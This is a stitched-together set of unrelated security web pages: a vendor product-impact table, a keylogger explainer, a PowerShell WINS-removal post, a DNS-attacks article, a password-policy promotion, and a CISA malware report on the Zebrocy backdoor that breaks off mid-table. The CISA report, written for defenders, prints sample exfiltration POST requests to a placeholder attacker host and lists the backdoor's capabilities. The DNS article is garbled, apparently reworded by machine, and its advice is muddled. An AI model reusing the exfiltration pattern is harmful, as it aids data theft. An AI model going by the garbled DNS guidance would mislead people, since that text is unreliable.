ActiveUpdateNot Affected
Apex Central (including as a Service)Not Affected
Apex One (all versions including SaaS, Mac, and Edge Relay))Not Affected
Cloud App SecurityResolved / Not Affected
Cloud EdgeNot Affected
Cloud One – Application SecurityNot Affected
Cloud One – Common ServicesNot Affected
Cloud One – ConformityNot Affected
Cloud One – Container SecurityNot Affected
Cloud One – File Storage SecurityNot Affected
Cloud One – Network SecurityNot Affected
Cloud One – Workload SecurityNot Affected
Cloud SandboxNot Affected
Deep Discovery AnalyzerNot Affected
Deep Discovery Email InspectorNot Affected
Deep Discovery InspectorNot Affected
Deep Discovery Web InspectorNot Affected
Deep SecurityNot Affected
Endpoint EncryptionNot Affected
FraudbusterNot Affected
Home Network SecurityNot Affected
HousecallNot Affected
Instant Messaging SecurityNot Affected
Internet Security for Mac (Consumer)Not Affected
Interscan Messaging SecurityNot Affected
Interscan Messaging Security Virtual Appliance (IMSVA)Not Affected
Interscan Web Security SuiteNot Affected
Interscan Web Security Virtual Appliance (IWSVA)Not Affected
Mobile Secuirty for EnterpriseNot Affected
Mobile Security for AndroidNot Affected
Mobile Security for iOSNot Affected
MyAccount (Consumer Sign-on)Not Affected
Network ViruswallNot Affected
OfficeScanNot Affected
Password ManagerNot Affected
Phish InsightNot Affected
Policy ManagerNot Affected
Portable SecurityNot Affected
PortalProtectNot Affected
Public Wifi Protection / VPN Proxy One ProNot Affected
Rescue DiskNot Affected
Rootkit BusterNot Affected
Safe Lock (TXOne Edition)Not Affected
Safe Lock 2.0Not Affected
Sandbox as a ServiceResolved / Not Affected
ScanMail for ExchangeNot Affected
ScanMail for IBM DominoNot Affected
Security for NASNot Affected
ServerProtect (all versions)Not Affected
Smart Home NetworkNot Affected
Smart Protection CompleteNot Affected
Smart Protection for EndpointsNot Affected
Smart Protection Server (SPS)Not Affected
TippingPoint AccessoriesNot Affected
TippingPoint IPS (N-, NX- and S-series)Not Affected
TippingPoint Network Protection (AWS & Azure)Not Affected
TippingPoint SMSNot Affected
TippingPoint Threat Management Center (TMC)Resolved / Not Affected
TippingPoint ThreatDVNot Affected
TippingPoint TPSNot Affected
TippingPoint TX-SeriesNot Affected
TippingPoint Virtual SMSNot Affected
TippingPoint Virtual TPSNot Affected
TMUSBNot Affected
Trend Micro Email Security & HESResolved / Not Affected
Trend Micro Endpoint SensorNot Affected
Trend Micro ID SecurityNot Affected
Trend Micro Remote ManagerNot Affected
Trend Micro Security (Consumer)Not Affected
Trend Micro Virtual Patch for EndpointNot Affected
Trend Micro Web SecurityResolved / Not Affected
TXOne (Edge Series)Not Affected
TXOne (Stellar Series)Not Affected
Vision OneResolved / Not Affected
Worry-Free Business Security (on-prem)Not Affected
Worry-Free Business Security ServicesNot Affected

Affected Products:

Deep Discovery DirectorAffectedPlease click here for more info

References

What is a Keylogger and How to Detect One

What is a keylogger?

A keylogger, which is also known as a keystroke logger or a keyboard capturer, is a piece of software or hardware developed to monitor and record everything you type on a keyboard. In this article, we dive into everything you need to know about them and teach you how to protect yourself from them!

Is a keystroke logger a virus?

It depends. Keyloggers were designed for legitimate purposes. They were originally used for computer troubleshooting, employee activity monitoring, and as a way to discover how users interact with programs so their user experience could be enhanced. However, they’ve since been used by hackers and criminals as a tool for stealing sensitive data such as usernames, passwords, bank account information, and other confidential information.

Generally, a keylogger is insidiously installed alongside an otherwise legitimate program. As a result, users are almost always unaware that their keystrokes a being monitored. Oftentimes, when a user’s computer is infected with a keylogger trojan, the malicious software will keep track of their keystrokes and save the information to their computer’s local drive. Later the hacker will retrieve the stored data. For this reason, keyloggers pose a serious threat to computer security and data privacy.

Keyloggers are separated into the following categories, based on how they work:

API-based

These keyloggers Application programming interfaces (APIs) allow software to communicate with hardware. API-based keyloggers intercept every keyboard input sent to the program you’re typing into.. This type of keylogger registers keystroke events as if it was a normal aspect of the application instead of malware. Each time a user presses or releases a key it is recorded.

Form grabbing-based

Form grabbing-based keyloggers log web form submissions by recording the inputted data when they are submitted. When a user submits a completed form, usually by clicking a button or pressing enter, their data is recorded even before it is passed over the Internet.

Kernel-based

These keyloggers work their way into a system’s core, allowing them access to admin-level permissions. These loggers have unrestricted access to everything entered into a computer system.

Javascript-based

A malicious script tag is injected into a targeted web page and it listens for keyboard events. Scripts can be injected using a variety of methods, including cross-site scripting, man-in-the-browser, and man-in-the-middle attacks, or when a website’s security is compromised.

How do keyloggers get on computers?

Most of the time, they infect computers with outdated antivirus software and ones without any antivirus software at all.

There are several scenarios that you need to be aware of:

  1. Keyloggers can be installed through web page scripts. Hackers utilize web browser vulnerabilities and embed malicious code on a webpage that silently executes the installation or data hijacking.
  2. Phishing. Keyloggers can be installed after users click on a nefarious link or open a malicious attachment in a phishing email.
  3. Social engineering. Some criminals use psychological manipulation to fool unsuspecting people into installing a keylogger by invoking urgency, fear, or anxiety in them.
  4. Unidentified software downloaded from the internet. Sometimes cracked software or applications from unidentified developers will secretly install a keylogger on a computer system.

How to detect a keylogger on my computer?

At this point, you might be interested in learning how you can detect a keylogger on your computer. The truth is, keyloggers are not easy to detect without the help of security software. Running a virus scan is necessary to detect them.

Trend Micro Housecall is an online security scanner that detects and removes viruses, worms, spyware, and other malicious threats such as keyloggers for free.

Keylogger_HouseCall

How to prevent keystroke logging malware?

Keyloggers are dangerous. Preventing them from ever being installed on your computer is a top priority. It is necessary to be proactive in protecting your computer to ensure that your data doesn’t get stolen.

Here are several tips to follow:

  • Carefully inspect user agreements for software before agreeing to them. There should always be a section covering how your data is used.
  • Install a trusted antivirus app such as TrendMicro Maximum Security. Always keep your antivirus on and regularly run scheduled scans of your device.
  • Make sure your security software is up to date.
  • Make sure your operating system is up to date and all the security patches are installed.
  • Avoid visiting suspicious websites and don’t click on any unusual links or e-mail attachments from unknown senders.
  • Only download and install software from trusted developers and sources.

    Source :
    https://news.trendmicro.com/2021/12/28/what-is-a-keylogger-and-how-to-detect-one/

Remove WINS & Disable Netbios over Tcpip PowerShell

As part of  a recent decommission / security audit, we needed to remove an old WINS server. For desktop client this is fairly easy as they are all assigned through DHCP so it was just a case of removing WINS from the DHCP scope options.

For the hundreds of servers it is set manually, which to remove one by one would take a long time and be pretty boring for the person tasked with it. So I decided the simplest option would be to use PowerShell.

First I wanted to check if servers had WINS enabled so I could reduce the amount of server I would need to run the disable script against.

I am going to use Get-WmiObject and the Win32_NetworkAdapterConfiguration class as this is the simplest way I found to do this in PowerShell.

We will use a text file with a list of server names and a variable called $WINSServer that will be used to filter only network interfaces that have WINS set.

Below is the script to check for WINS and output to PowerShell windows I am just getting all adapters that have WINSPriamryServer value set to the IP in the $WINSServer variable and then selecting the objects to be outputted.

If you wanted to export to a csv or text file just add a | after the WINSPrimaryServer at the end of the script and do either Out-file or Export-csv and the path to export too. 

Below is the link to the script location on Github it called Check-Wins.ps1

https://github.com/TheSleepyAdmin/Scripts/tree/master/General/Remove%20Wins

WINSTo remove the WINS IP and set NetBios option, we will use the set method in the WMI class.

Below is the link to the script location on Github it called Remove-Wins.ps1 :

https://github.com/TheSleepyAdmin/Scripts/tree/master/General/Remove%20Wins

WINS01Once the script has run WINS should be removed and NetBios over Tcpip should be disabled this can be checked under the advanced properties on the NIC.

WINS02

Source:
https://thesleepyadmins.com/2019/10/27/remove-wins-disable-netbios-over-tcpip-powershell/

Top 10 Dangerous DNS Attacks Types and The Prevention Measures

From the above topic, we can guess that today, we are going to discuss the top 10 DNS attacks and how to mitigate them. DNS stands for Domain Name System which remains under constant attacks, and thus we can assume there is no end in sight because the threats are growing increasingly nowadays.

DNS generally uses UDP fundamentally and in some cases, uses TCP as well. When it uses the UDP protocol, which is connectionless and can be tricked easily.

Thus DNS protocol is remarkably popular as a DDoS tool, and DNS, recognized as the internet’s phonebook, which is a component of the global internet foundation that transmutes between well-known names and the number that a computer needed to enter a website and send an email.

DNS has long been the target of attackers looking to take all custom of corporate and secret data, hence, the warnings in the past year indicate a worsening of the condition.

As per the IDC’s research, the average costs correlated with a DNS mugging rose by 49% associated with a year earlier. However, in the U.S., the average price of a DNS attack trims out at more than $1.27 million.

Approximately half of the respondents (48%) state that wasting more than $500,000 to a DNS attack, and about 10% say that they lost more than $5 million on each break. In extension, the preponderance of U.S. companies says that it needed more than one day to determine a DNS attack.

Shockingly, as per the information both in-house and cloud applications were destroyed, the 100% growth of threats in the in-house application interlude, frothingly it is now the most widespread destruction experienced that IDC composed.

Thus the “DNS attacks are running away from real brute-force to more complicated attacks running from the internal network. Thus the complicated attack will push the organizations to use intelligent mitigation tools so that they can easily cope with insider threats.”

Therefore we have provided the top 10 DNS attacks and the proper solutions to fix them, so that it will be easy for the organizations to recognize the attacks and can quickly solve it.

Famous DNS Attacks Type:

  1. DNS Cache Poisoning Attack
  2. Distributed Reflection Denial of Service (DRDoS)
  3. DNS Hijacking
  4. Phantom Domain Attack
  5. TCP SYN Floods
  6. Random Subdomain Attack
  7. DNS Tunneling
  8. DNS Flood Attack
  9. Domain Hijacking
  10. Botnet-based Attacks

DNS Cache Poisoning Attack

At first, we have the cache poisoning, it’s one of the frequent attacks, and its main aim is to take the web users towards the scam websites, as for example, a user accesses gmail.com through the web browser to consult their mailbox.

Moreover, the DNS is becoming poisoned, and it’s not the gmail.com page which is exposed but a scam page determined by the criminal, in order, for example, to reclaim the email box accesses. Thus the users accessing the correct domain name will not see that the website they’re entering is not the right one but a scam one.

DNS Attacks
Cache poisoning

Basically, it generates an excellent possibility for cybercriminals to use phishing techniques to steal information, both identification information or credit card information from ingenuous victims. The attack can be devastating, depending on several factors, the attacker’s purpose, and the DNS poisoning impact.

DNS Attack Mitigation – Cache poisoning

As per the information, there are several forms to solve or to prevent this attack. For beginners, the IT teams should configure DNS servers to rely as small as possible on trust relations with other DNS servers. Performing so will make it more difficult for attackers to practice their DNS servers to debased their targets’ servers. There is another method to prevent cache poisoning attacks, as IT teams should also configure their DNS name servers to:-

  • To restrict recursive queries.
  • To store only data associated with the requested domain.
  • To restrict query responses to only given information about the demanded domain.

Not only this, but there are also some cache poisoning tools accessible to help organizations for preventing cache poisoning outbreaks. And the most famous cache poisoning prevention tool is the DNSSEC (Domain Name System Security Extension), a tool that is produced by the Internet Engineering Task Force, which provides reliable DNS data authentication.

Distributed Reflection Denial of Service (DRDoS)

Distributed reflective denial of service (DRDoS) attacks concentrate on bringing down the availability of an asset within an authoritative volume of UDP acknowledgments. In some instances, the attacker would transfer a DNS, NTP, etc.

They demand a parodied source IP, with the purpose of a more extensive acknowledgment being transferred to the host who indeed continues at the address that was forged.

DNS Attacks
DRDoS Attack

UDP is the protocol of different choices for this variety of attacks, as it does not build a connection state. For example, suppose a spoofed source of IP in the SYN package of a TCP connection would cause immediate termination just because the SYN/ACK will go away.

This practice makes reflection potential and possible, meanwhile, regulating these attacks at the proper scale, the idea of shared reflection becomes clear; hence, various endpoints transmitting spoofed UDP offers, generating acknowledgments that will be concentrated upon a target.

Once these response packs begin to appear, the goal experiences a loss of availability.

How to Prevent?

Usually, organizations should commence on preparing for DDoS attacks in advance, it is exceedingly harder to answer after an attack because it is already underway.

Moreover, DDoS attacks can’t be stopped, therefore some steps can be taken to make it more troublesome for an attacker to perform a network unresponsive. The following steps will help you to scatter organizational assets to bypass performing a single deep target to an attacker.

  • First, locate servers in different data centers.
  • Assure that your data centers are located on various networks.
  • Make sure that data centers have several paths.
  • Make sure that the data centers, or the networks that the data centers are related to, have no essential security holes or single points of failure.

An organization that relies on servers and Internet port, for them, it is essential to make sure that devices are geographically scattered and not located in a particular data center.

Moreover, if the resources are already geographically dispersed, then it’s essential to inspect each data station is having more than one channel to the internet and assure that not all data stations are attached to the corresponding internet provider.

DNS Hijacking

DNS hijacking is a method in which an individual can divert to the doubtful DNS (Domain Name System). However, it may be achieved by using malicious software or unauthorized alteration of a server.

DNS Hijacking

Meanwhile, the individual has the authority of the DNS; they can guide others who obtain it to a web page that seems identical but carries extra content like advertisements. They can also guide users to pages carrying malware or a third-party search engine as well.

How to Prevent?

A DNS name server is a compassionate foundation that needs necessary protection measures because it can be hijacked and used by several hackers to raise DDoS attacks on others, thus, here we have mentioned some prevention of DNS hijacking.

  • See for resolvers on your network.
  • Critically restrict access to a name server.
  • Utilize measures against cache poisoning.
  • Instantly patch known vulnerabilities.
  • Separate the authoritative name server from the resolver.
  • Restrain zone alterations.

Phantom domain attack

Phantom domain attacks are kind of comparable to casual subdomain attacks. Thus in this kind of attack, the attackers attack your DNS resolver and overpower it to use up supplies to determine that’s what we name “phantom” domains, as these phantom domains will never respond to the queries.

Phantom Domain Attack

The main motive of this attack is to let the DNS resolver server await for the answer for a long time, ultimately leading to failure or deteriorated DNS performance problems.

How to Prevent?

To identify phantom domain attacks, you can analyze your log messages. Moreover, you can also follow the steps that we have mentioned below to mitigate this attack.

  • First, increase the number of recursive clients.
  • Use a proper sequence of the following parameters to gain optimum results.
  • Restrict recursive queries per server and Restrict recursive inquiries per zone.
  • Empower to hold down for non-responsive servers and Check recursive queries per zone.

When you allow any of the options, the failure values are set at an excellent level for overall operations. However, you should keep the default charges while using these commands, moreover, it guarantees that you know the consequences if you want to replace the default values.

TCP SYN Floods

An SYN Flood is a simple form of Denial-of-Service (DDoS) attack that can target any operation related to the internet and thus implementing Transmission Control Protocol (TCP) services.

An SYN wave is a type of TCP State-Exhaustion attack that endeavors to utilize the connection element tables present in common infrastructure elements, for example, load balancers, firewalls, Intrusion Prevention Systems (IPS), and the utilization servers themselves.

DNS Attacks
TCP SYN Flooding Attack

Hence, This type of attack can bring down even high-capacity devices fitted to managing millions of links. Moreover, a TCP SYN flood attack occurs when the attacker overflows the system with SYN questions to destroy the target and make it incapable of reacting to new real connection offers.

Thus it encourages all of the target server’s information ports into a half-open state.

How to Prevent?

So, the firewalls and IPS devices, while important to network security, are not sufficient to protect a network from complex DDoS attacks.

Nowadays, the more sophisticated attack methodologies demand a multi-faceted program that allows users to look beyond both internet foundation and network availability.

Thus there are some capabilities that you can count for more powerful DDoS security and faster mitigation of TCP SYN flood attacks.

  • At first, provide proper support to both inline and out-of-band deployment to assure that there is not only one single point of collapse on the network.
  • Extensive network distinctness with the capacity to see and examine traffic from various parts of the network.
  • Different sources of threat intelligence, including statistical exception detection, customizable entrance alerts, and fingerprints of known threats that assure fast and reliable detection.

Extensible to handle attacks of all sizes, extending from low-end to high-end and high-end to low-end.

Random Subdomain Attack

This is not the most prevalent type of DNS attack, but it can happen from time to time on several networks. Hence, the random subdomain attacks can often be identified as DoS attacks, as their creation adheres to the same goal as simple DoS.

Incase, spoilers send a lot of DNS inquiries against a healthy and active domain name. However, the questions will not target the primary domain name, but it will harm a lot of non-existing subdomains.

DNS Attacks
Random Subdomain Attack

Basically, the main motive of this attack is to build a DoS that will immerse the authorized DNS server that receives the primary domain name, and finally let the interruption of all DNS record lookups.

Thus It’s an attack that’s hard to identify, as the queries will come from infected users who don’t even understand they’re sending certain types of questions, from what are eventually legitimate computers.

How to Prevent?

Thus we have provided you a simple method for preventing the random subdomain attack only in a 30-minute.

  • In the beginning, you have to learn the techniques to mitigate the attacks that generate extreme traffic on resolvers and web resources that are connected with the victim the names that can be taken down.
  • Next, Hear about modern capabilities like Response Rate Limiting for preserving DNS experts that provoke attacks.

DNS tunneling

This is a cyber attack that is used to carry encoded data from different applications inside DNS acknowledgments and queries.

DNS Tunneling

Meanwhile, this system wasn’t formerly created to attack multitudes, but to bypass interface controls, now it is mostly used to achieve remote attacks.

To implement DNS tunneling, attackers demand to gain entrance to a settled system, as well as access to an internal DNS server, a domain name, and a DNS authoritative server.

How to Prevent?

To configure the firewall to identify and block DNS tunneling by designing an application rule that uses some protocol object, we have mentioned three steps to mitigate these types of attacks.

  • Create an access rule.
  • Create a protocol object.
  • Create an application rule.

DNS Flood Attack

This is one of the most primary types of DNS attacks, and in this Distributed Denial of Service (DDoS), the intruder will hit your DNS servers.

The main motive of this kind of DNS flood is to completely overload your server so that it cannot maintain serving DNS requests because all the treated DNS zones influence the purpose of resource records.

DNS Attacks
DNS Flood Attack

Thus this kind of attack is relieved easily as the source usually comes from one single IP. However, it can get complicated when it becomes a DDoS where a hundred or thousand gatherings are involved.

While a lot of questions will be immediately identified as malicious bugs and a lot of legitimate requests will be made to mislead defense devices, hence, this makes the mitigation method a little bit difficult sometimes.

How to Prevent?

Domain Name System (DNS) has developed a target of the Distributed Denial of Service (DDoS) attacks. When a DNS is below a DDoS flood attack, all the domain data under that DNS enhances unreachable, thus ultimately creating the unavailability of those appropriate domain names.

Hence, for this type of attack, we have introduced a method that includes the periodic stale content update and manages a list of the most commonly queried domain names of several DNS servers. Hence our simulation outcomes show that our method can work more than 70% of the total cache replies during a massive DNS Flood attack.

Domain Hijacking

This type of attack involves settings in your DNS servers and domain registrar that can manage your traffic away from the actual servers to new destinations.

Domain hijacking is usually affected by a lot of determinants related to exploiting a vulnerability in the domain name registrar’s system, but can also be performed at the DNS level when attackers take command of your DNS records.

Hence when the attacker hijacked your domain name, it will be used to originate malicious movements such as installing up a fake page of repayment systems like PayPal, Visa, or bank systems. Attackers will produce an identical copy of the real website that reads critical personal knowledge, such as email addresses, usernames, and passwords.

How to Prevent?

Thus you can simply mitigate the domain hijacking by practicing a few steps that we have mentioned below.

  • Upgrade your DNS in the application foundation.
  • Use DNSSEC.
  • Secure access.
  • Client lock.

Botnet-based Attacks

If we talk about the botnet, then let me clarify that it is a number of Internet-connected devices, and it can be practiced to implement a distributed denial-of-service attack (DDoS attack), which steal data, transmit spam, and enables the attacker to obtain access to the device and its connection.

DNS Attacks
Botnet-based Attacks

Moreover, botnets are diverse and evolving threats, hence, all these attacks are bound to develop in parallel with our growing dependence on digital devices, the internet, and new future technologies.

The botnets can be counted as attacks, as well as programs for future attacks, with this as the foundational prospect, this study explores how a botnet described and organized, how it is created, and used.

How to Prevent?

This is one of the frequent DNS attacks which have been faced by the victims every day, thus to mitigate these type of attacks, we have mentioned below few steps so that it will be helpful for you.

  • At first, understand your vulnerabilities properly.
  • Next, secure the IoT devices.
  • Identify both your mitigation myths from facts.
  • Discover, classify and control.

Conclusion

As you see, DNS service is essential for preserving your companies’ websites and online assistance working day-to-day. Thus if you’re looking for methods to evade these kinds of DNS attacks, then this post will be helpful for you. So, what do you think about this? Simply share all your views and thoughts in the comment section below. And if you liked this post then simply do not forget to share this post with your friends and family.

How to Use Password Length to Set Best Password Expiration Policy

One of the many features of an Active Directory Password Policy is the maximum password age. Traditional Active Directory environments have long using password aging as a means to bolster password security. Native password aging in the default Active Directory Password Policy is relatively limited in configuration settings.

Let’s take a look at a few best practices that have changed in regards to password aging. What controls can you enforce in regards to password aging using the default Active Directory Password Policy? Are there better tools that organizations can use regarding controlling the maximum password age for Active Directory user accounts?

What password aging best practices have changed?

Password aging for Active Directory user accounts has long been a controversial topic in security best practices.

While many organizations still apply more traditional password aging rules, noted security organizations have provided updated password aging guidance. Microsoft has said that they are dropping the password-expiration policies from the Security baseline for Windows 10 v1903 and Windows Server v1903. The National Institute of Standards and Technology (NIST) has long offered a cybersecurity framework and security best practice recommendations.

As updated in SP 800-63B Section 5.1.1.2 of the Digital Identity Guidelines – Authentication and Lifecycle Management, note the following guidance:

“Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator.” NIST helps to explain the guidance change in their FAQ page covering the Digital Identity Guidelines.

It states: “Users tend to choose weaker memorized secrets when they know that they will have to change them in the near future. When those changes do occur, they often select a secret that is similar to their old memorized secret by applying a set of common transformations such as increasing a number in the password. This practice provides a false sense of security if any of the previous secrets has been compromised since attackers can apply these same common transformations. But if there is evidence that the memorized secret has been compromised, such as by a breach of the verifier’s hashed password database or observed fraudulent activity, subscribers should be required to change their memorized secrets. However, this event-based change should occur rarely, so that they are less motivated to choose a weak secret with the knowledge that it will only be used for a limited period of time.”

With the new guidance from the above organizations and many others, security experts acknowledge that password aging, at least in itself, is not necessarily a good strategy to prevent the compromise of passwords in the environment.

The recent changes in password aging guidance also apply to traditional Microsoft Active Directory Password Policies.

Active Directory Password Policy Password Aging

The capabilities of the password change policies in default Active Directory Password Policies are limited. You can configure the maximum password age, and that is all. By default, Active Directory includes the following Password Policy settings:

  • Enforce password history
  • Maximum password age
  • Minimum password age
  • Minimum password length
  • Minimum password length audit
  • Password must meet complexity requirements
  • Store passwords using reversible encryption

When you double click the maximum password age, you can configure the maximum number of days a user can use the same password.

When you look at the explanation given for the password age, you will see the following in the Group Policy setting:

“This security setting determines the period of time (in days) that a password can be used before the system requires the user to change it. You can set passwords to expire after a number of days between 1 and 999, or you can specify that passwords never expire by setting the number of days to 0. If the maximum password age is between 1 and 999 days, the minimum password age must be less than the maximum password age. If the maximum password age is set to 0, the minimum password age can be any value between 0 and 998 days.”

Defining the maximum password age with Active Directory Password Policy

With the default policy setting, you really can either turn the policy on or off and then set the number of days before the user password expires. What if you had further options to control the maximum password age and set different values based on the password complexity?

Specops Length Based Password Policy

As mentioned, recent guidance from many cybersecurity best practice authorities recommends against forced password changes and details the reasons for this change. However, many organizations may still leverage password aging as a part of their overall password security strategy to protect against user passwords falling into the wrong hands. What if IT admins had features in addition to what is provided by Active Directory?

Specops Password Policy provides many additional features when compared to the default Active Directory Password Policy settings, including password expiration. One of the options contained in the Specops Password Policy is called “Length based password aging.

Using this setting, organizations can define different “levels” of password expiration based on the user password’s length. It allows much more granularity in how organizations configure password aging in an Active Directory environment compared to using the default Active Directory Password Policy configuration settings.

It also allows targeting the weakest passwords in the environment and forcing these to age out the quickest. You will note in the screenshot. The length-based password aging in Specops Password Policy is highly configurable.

It includes the following settings:

  • Number of expiration levels – Enter how many expiration levels there will be. An expiration level determines how many extra days the user will have until their password expires and they are required to change it. This depends on how long the user’s password is. To increase the number of levels, move the slider to the right. The maximum number of expiration levels that can exist is 5.
  • Characters per level – The number of additional characters per level that define the extra days in password expiration
  • Extra days per level – How many additional expiration days each level is worth.
  • Disable expiration for the last level – Passwords that meet the requirements for the final expiration level in the list will not expire.
Configuring the Length based password policy in Specops Password Policy

Specops allows easily notifying end-users when their password is close to expiring. It will inform end-users at login or by way of sending an email notification. You can configure the days before expiration value for each of these settings.

Configuring password expiration notifications in Specops Password Policy

Organizations define the minimum and maximum password length configurations in the Password Rules area of the Specops Password Policy configuration. If you change the minimum and maximum password length configuration, the password length values in each level of the length-based password expiration will change as well.

Configuring the minimum and maximum password length

Combined with other Specops Password Policy features, such as breached password protection, the length-based password expiration strengthens enterprise password policies for both on-premises and remote workers.

Wrapping Up

Password aging has long been a feature of Active Directory Password Policies in most enterprise environments. However, as attackers get better at compromising passwords, new security best practice guidance is no longer recommending organizations make use of standard password aging.

Specops Password Policy provides compelling password aging capabilities that allow extending password aging features compared to default Active Directory Password Policies. By adding expiration levels, Specops Password Policy allows effectively targeting weak passwords in the environment by quickly aging these passwords out. End-users can use strong passwords much longer.

Organizations can even decide never to expire specific passwords that meet the defined password length. Using Specops Password Policy features, including length-based password expiration, helps to ensure more robust password security in the environment. Click here to learn more.

Malware Analysis Report (AR20-303B) MAR-10310246-1.v1 – ZEBROCY Backdoor

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

backdoor

Details
Namesmqft_exe
Size4307968 bytes
TypePE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA2560be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy6.196940
Antivirus
BitDefenderGen:Variant.Babar.17722
EmsisoftGen:Variant.Babar.17722 (B)
LavasoftGen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date1969-12-31 19:00:00-05:00
Import Hash20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5NameRaw SizeEntropy
b6114d2ef9c71d56d934ad743f66d209header10242.184050
0ead1c8fd485e916e3564c37083fb754.text19522566.048645
a5a4f98bad8aefba03b1fd8efa3e8668.data1960965.841971
96bfb1a9a7e45816c45b7d7c1bf3c578.rdata21539845.690400
916cd27c0226ce956ed74ddf600a3a94.eh_fram10244.244370
d41d8cd98f00b204e9800998ecf8427e.bss00.000000
1f825370fd049566e1e933455eb0cd06.idata25604.462264
486c39eb96458f6f5bdb80d71bb0f828.CRT5120.118370
aa692f6a7441edad64447679b7d321e8.tls5120.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI) or it can run using a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

–Begin arguments–
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
–End arguments–

When executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\Personalization\EUDC\Policies\3030304332393839394630353537343934453244.”

It also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID), and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

–Begin POST requests–

–Begin POST request sample–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228–
–End POST request sample–

–Begin POST request sample–
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108–
–End POST request sample–

–End POST requests–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details
Namesespmw_exe
Size4313600 bytes
TypePE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5e8596fd7a15ecc86abbbfdea17a9e73a
SHA1be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA2562631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA5124a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy6.197768
Antivirus
BitDefenderGen:Variant.Babar.17722
EmsisoftGen:Variant.Babar.17722 (B)
LavasoftGen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date1970-01-04 14:01:20-05:00
Import Hash20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5NameRaw SizeEntropy
2ebbe6c38d9e8d4da2449cc05f78054aheader10242.198390
a7c0885448e7013e05bf5ff61b673949.text19548166.046127
9bf966747acfa91eea3d6a1ef17cc30f.data1960965.843286
31182660fce8ae07d0350ebe456b9179.rdata21570565.696834
